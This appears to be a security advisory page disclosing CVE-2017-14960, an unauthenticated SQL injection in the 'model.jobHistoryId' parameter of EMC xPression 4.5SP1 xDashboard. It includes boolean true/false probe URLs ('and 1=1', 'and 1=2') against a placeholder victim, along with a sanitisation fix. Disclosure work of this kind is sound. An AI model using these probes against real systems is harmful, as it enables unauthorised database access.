EMC xPression 4.5SP1 Patch 13 model.jobHistoryId SQL Injection

2018.01.04

Credit: Pawel Gocyla

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2017-14960

CWE: CWE-89

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

Title: EMC xDashboard - SQL Injection Vulnerability
Author: Pawel Gocyla
Date: 02 January 2018

CVE: CVE-2017-14960


Affected Software:
==================
EMC xPression v4.5SP1 Patch 13
Probably other versions are also vulnerable.


SQL Injection Vulnerability:
==============================
This vulnerability allows an attacker to retrieve information from the
database

Vulnerable parameter: "$model.jobHistoryId"

Exploit:

True Condition:  https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=1
False Condition: https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=2

Fix:
====
User input which is putted into sql queries should be properly filtred or
sanitized

References:
============
https://www.owasp.org/index.php/SQL_Injection

Contact:
========
pawellgocyla[at]gmail[dot]com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

EMC xPression 4.5SP1 Patch 13 model.jobHistoryId SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.